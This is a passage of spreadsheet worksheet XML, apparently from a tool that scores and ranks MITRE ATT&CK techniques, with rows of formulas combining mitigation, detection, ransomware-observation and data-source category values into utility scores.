    </row>
    <row r="594" spans="1:47" ht="51">
      <c r="A594" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="B594" s="37">
        <f t="shared" si="9"/>
        <v>432.8494378571429</v>
      </c>
      <c r="C594" s="37" t="s">
        <v>1938</v>
      </c>
      <c r="D594" s="50" t="s">
        <v>1934</v>
      </c>
      <c r="E594" s="37" t="s">
        <v>1663</v>
      </c>
      <c r="F594" s="37">
        <v>0</v>
      </c>
      <c r="G594" s="37">
        <v>1</v>
      </c>
      <c r="H594" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I594" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J594" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K594" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L594" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M594" s="37">
        <v>0</v>
      </c>
      <c r="N594" s="56">
        <v>0</v>
      </c>
      <c r="O594" s="56">
        <v>0</v>
      </c>
      <c r="P594" s="56">
        <v>0</v>
      </c>
      <c r="Q594" s="56">
        <v>0</v>
      </c>
      <c r="R594" s="57" t="s">
        <v>416</v>
      </c>
      <c r="S594" s="57">
        <v>3</v>
      </c>
      <c r="T594" s="57" t="s">
        <v>1667</v>
      </c>
      <c r="U594" s="57">
        <v>11</v>
      </c>
      <c r="V594" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.13333309523809525</v>
      </c>
      <c r="W594" s="37">
        <v>14</v>
      </c>
      <c r="X594" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y594" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z594" s="37">
        <v>0</v>
      </c>
      <c r="AA594" s="37">
        <v>0</v>
      </c>
      <c r="AB594" s="37">
        <v>0</v>
      </c>
      <c r="AC594" s="37"/>
      <c r="AD594" s="50" t="s">
        <v>1151</v>
      </c>
      <c r="AE594" s="37" t="str" cm="1">
        <f t="array" ref="AE594">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD594)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF594" s="37">
        <v>590</v>
      </c>
      <c r="AG594" s="37" t="str" cm="1">
        <f t="array" ref="AG594">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD594)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH594" s="37">
        <v>590</v>
      </c>
      <c r="AI594" s="37" t="str" cm="1">
        <f t="array" ref="AI594">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD594)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ594" s="37">
        <v>590</v>
      </c>
      <c r="AK594" s="37" t="str" cm="1">
        <f t="array" ref="AK594">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD594)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL594" s="37">
        <v>590</v>
      </c>
      <c r="AM594" s="37" t="str" cm="1">
        <f t="array" ref="AM594">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD594)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN594" s="37">
        <v>0</v>
      </c>
      <c r="AO594" s="37">
        <v>3</v>
      </c>
      <c r="AP594" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="AQ594" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>144.28314595238098</v>
      </c>
      <c r="AR594" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS594" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AT594" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="AU59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10.377367568027211</v>
      </c>
    </row>
    <row r="595" spans="1:47" ht="51">
      <c r="A595" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B595" s="37">
        <f t="shared" si="9"/>
        <v>366.01190476190476</v>
      </c>
      <c r="C595" s="37" t="s">
        <v>1939</v>
      </c>
      <c r="D595" s="50" t="s">
        <v>1934</v>
      </c>
      <c r="E595" s="37" t="s">
        <v>1665</v>
      </c>
      <c r="F595" s="37">
        <v>0</v>
      </c>
      <c r="G595" s="37">
        <v>1</v>
      </c>
      <c r="H595" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I595" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J595" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K595" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L595" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M595" s="37">
        <v>0</v>
      </c>
      <c r="N595" s="56">
        <v>0</v>
      </c>
      <c r="O595" s="56">
        <v>0</v>
      </c>
      <c r="P595" s="56">
        <v>0</v>
      </c>
      <c r="Q595" s="56">
        <v>0</v>
      </c>
      <c r="R595" s="57" t="s">
        <v>416</v>
      </c>
      <c r="S595" s="57">
        <v>0</v>
      </c>
      <c r="T595" s="57" t="s">
        <v>1667</v>
      </c>
      <c r="U595" s="57">
        <v>11</v>
      </c>
      <c r="V595" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.10476190476190478</v>
      </c>
      <c r="W595" s="37">
        <v>11</v>
      </c>
      <c r="X595" s="37">
        <v>0.2</v>
      </c>
      <c r="Y595" s="37">
        <v>0.2</v>
      </c>
      <c r="Z595" s="37">
        <v>0</v>
      </c>
      <c r="AA595" s="37">
        <v>0</v>
      </c>
      <c r="AB595" s="37">
        <v>0</v>
      </c>
      <c r="AC595" s="37"/>
      <c r="AD595" s="50" t="s">
        <v>1151</v>
      </c>
      <c r="AE595" s="37" t="str" cm="1">
        <f t="array" ref="AE595">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD595)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF595" s="37">
        <v>591</v>
      </c>
      <c r="AG595" s="37" t="str" cm="1">
        <f t="array" ref="AG595">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD595)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH595" s="37">
        <v>591</v>
      </c>
      <c r="AI595" s="37" t="str" cm="1">
        <f t="array" ref="AI595">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD595)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ595" s="37">
        <v>591</v>
      </c>
      <c r="AK595" s="37" t="str" cm="1">
        <f t="array" ref="AK595">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD595)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL595" s="37">
        <v>591</v>
      </c>
      <c r="AM595" s="37" t="str" cm="1">
        <f t="array" ref="AM595">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD595)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN595" s="37">
        <v>0</v>
      </c>
      <c r="AO595" s="37">
        <v>2</v>
      </c>
      <c r="AP595" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ595" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>122.00396825396825</v>
      </c>
      <c r="AR595" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS595" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT595" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU59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5.8573318216175352</v>
      </c>
    </row>
    <row r="596" spans="1:47" ht="17">
      <c r="A596" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B596" s="37">
        <f t="shared" si="9"/>
        <v>236.9</v>
      </c>
      <c r="C596" s="37" t="s">
        <v>3823</v>
      </c>
      <c r="D596" s="50" t="s">
        <v>1934</v>
      </c>
      <c r="E596" s="37" t="s">
        <v>3810</v>
      </c>
      <c r="F596" s="37">
        <v>1</v>
      </c>
      <c r="G596" s="37">
        <v>1</v>
      </c>
      <c r="H596" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I596" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J596" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K596" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L596" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M596" s="37">
        <v>0</v>
      </c>
      <c r="N596" s="56">
        <v>0</v>
      </c>
      <c r="O596" s="56">
        <v>0</v>
      </c>
      <c r="P596" s="56">
        <v>0</v>
      </c>
      <c r="Q596" s="56">
        <v>0</v>
      </c>
      <c r="R596" s="57"/>
      <c r="S596" s="57"/>
      <c r="T596" s="57"/>
      <c r="U596" s="57"/>
      <c r="V596" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W596" s="37"/>
      <c r="X596" s="37"/>
      <c r="Y596" s="37"/>
      <c r="Z596" s="37"/>
      <c r="AA596" s="37"/>
      <c r="AB596" s="37"/>
      <c r="AC596" s="37"/>
      <c r="AD596" s="50" t="s">
        <v>227</v>
      </c>
      <c r="AE596" s="37" t="str" cm="1">
        <f t="array" ref="AE596">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD596)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF596" s="37">
        <v>592</v>
      </c>
      <c r="AG596" s="37" t="str" cm="1">
        <f t="array" ref="AG596">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD596)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH596" s="37">
        <v>592</v>
      </c>
      <c r="AI596" s="37" t="str" cm="1">
        <f t="array" ref="AI596">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD596)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ596" s="37">
        <v>592</v>
      </c>
      <c r="AK596" s="37" t="str" cm="1">
        <f t="array" ref="AK596">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD596)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL596" s="37">
        <v>592</v>
      </c>
      <c r="AM596" s="37" t="str" cm="1">
        <f t="array" ref="AM596">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD596)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN596" s="37"/>
      <c r="AO596" s="37"/>
      <c r="AP596" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ596" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>78.966666666666669</v>
      </c>
      <c r="AR596" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS596" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT596" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU59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97" spans="1:47" ht="34">
      <c r="A597" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B597" s="37">
        <f t="shared" si="9"/>
        <v>841.84977399999991</v>
      </c>
      <c r="C597" s="37" t="s">
        <v>1940</v>
      </c>
      <c r="D597" s="50" t="s">
        <v>1941</v>
      </c>
      <c r="E597" s="37"/>
      <c r="F597" s="37">
        <v>1</v>
      </c>
      <c r="G597" s="37">
        <v>0</v>
      </c>
      <c r="H597" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I597" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J597" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K597" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L597" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M597" s="37">
        <v>0</v>
      </c>
      <c r="N597" s="56">
        <v>0</v>
      </c>
      <c r="O597" s="56">
        <v>0</v>
      </c>
      <c r="P597" s="56">
        <v>0</v>
      </c>
      <c r="Q597" s="56">
        <v>0</v>
      </c>
      <c r="R597" s="57" t="s">
        <v>1942</v>
      </c>
      <c r="S597" s="57">
        <v>14</v>
      </c>
      <c r="T597" s="57" t="s">
        <v>1943</v>
      </c>
      <c r="U597" s="57">
        <v>18</v>
      </c>
      <c r="V597" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.30476180952380949</v>
      </c>
      <c r="W597" s="37">
        <v>32</v>
      </c>
      <c r="X597" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Y597" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Z597" s="37">
        <v>0</v>
      </c>
      <c r="AA597" s="37">
        <v>0</v>
      </c>
      <c r="AB597" s="37">
        <v>0</v>
      </c>
      <c r="AC597" s="37"/>
      <c r="AD597" s="50" t="s">
        <v>526</v>
      </c>
      <c r="AE597" s="37" t="str" cm="1">
        <f t="array" ref="AE597">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD597)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF597" s="37">
        <v>593</v>
      </c>
      <c r="AG597" s="37" t="str" cm="1">
        <f t="array" ref="AG597">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD597)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH597" s="37">
        <v>593</v>
      </c>
      <c r="AI597" s="37" t="str" cm="1">
        <f t="array" ref="AI597">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD597)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ597" s="37">
        <v>593</v>
      </c>
      <c r="AK597" s="37" t="str" cm="1">
        <f t="array" ref="AK597">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD597)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL597" s="37">
        <v>593</v>
      </c>
      <c r="AM597" s="37" t="str" cm="1">
        <f t="array" ref="AM597">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD597)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN597" s="37">
        <v>0</v>
      </c>
      <c r="AO597" s="37">
        <v>0</v>
      </c>
      <c r="AP597" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ597" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>280.6165913333333</v>
      </c>
      <c r="AR597" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS597" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT597" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU59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98" spans="1:47" ht="34">
      <c r="A598" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B598" s="37">
        <f t="shared" si="9"/>
        <v>854.58786885714267</v>
      </c>
      <c r="C598" s="37" t="s">
        <v>1944</v>
      </c>
      <c r="D598" s="50" t="s">
        <v>1941</v>
      </c>
      <c r="E598" s="37" t="s">
        <v>1945</v>
      </c>
      <c r="F598" s="37">
        <v>1</v>
      </c>
      <c r="G598" s="37">
        <v>0</v>
      </c>
      <c r="H598" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I598" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J598" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K598" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L598" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M598" s="37">
        <v>0</v>
      </c>
      <c r="N598" s="56">
        <v>0</v>
      </c>
      <c r="O598" s="56">
        <v>1</v>
      </c>
      <c r="P598" s="56">
        <v>0</v>
      </c>
      <c r="Q598" s="56">
        <v>0</v>
      </c>
      <c r="R598" s="57" t="s">
        <v>1942</v>
      </c>
      <c r="S598" s="57">
        <v>14</v>
      </c>
      <c r="T598" s="57" t="s">
        <v>1943</v>
      </c>
      <c r="U598" s="57">
        <v>18</v>
      </c>
      <c r="V598" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.30952371428571424</v>
      </c>
      <c r="W598" s="37">
        <v>32</v>
      </c>
      <c r="X598" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Y598" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Z598" s="37">
        <v>1</v>
      </c>
      <c r="AA598" s="37">
        <v>0.01</v>
      </c>
      <c r="AB598" s="37">
        <v>0.01</v>
      </c>
      <c r="AC598" s="37"/>
      <c r="AD598" s="50" t="s">
        <v>526</v>
      </c>
      <c r="AE598" s="37" t="str" cm="1">
        <f t="array" ref="AE598">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD598)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF598" s="37">
        <v>594</v>
      </c>
      <c r="AG598" s="37" t="str" cm="1">
        <f t="array" ref="AG598">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD598)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH598" s="37">
        <v>594</v>
      </c>
      <c r="AI598" s="37" t="str" cm="1">
        <f t="array" ref="AI598">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD598)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ598" s="37">
        <v>594</v>
      </c>
      <c r="AK598" s="37" t="str" cm="1">
        <f t="array" ref="AK598">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD598)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL598" s="37">
        <v>594</v>
      </c>
      <c r="AM598" s="37" t="str" cm="1">
        <f t="array" ref="AM598">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD598)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN598" s="37">
        <v>0</v>
      </c>
      <c r="AO598" s="37">
        <v>0</v>
      </c>
      <c r="AP598" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ598" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>284.86262295238089</v>
      </c>
      <c r="AR598" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS598" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT598" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU59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99" spans="1:47" ht="17">
      <c r="A599" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B599" s="37">
        <f t="shared" si="9"/>
        <v>119.05000000000001</v>
      </c>
      <c r="C599" s="37" t="s">
        <v>1946</v>
      </c>
      <c r="D599" s="50" t="s">
        <v>1947</v>
      </c>
      <c r="E599" s="37"/>
      <c r="F599" s="37">
        <v>1</v>
      </c>
      <c r="G599" s="37">
        <v>0</v>
      </c>
      <c r="H599" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I599" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J599" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K599" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L599" s="37">
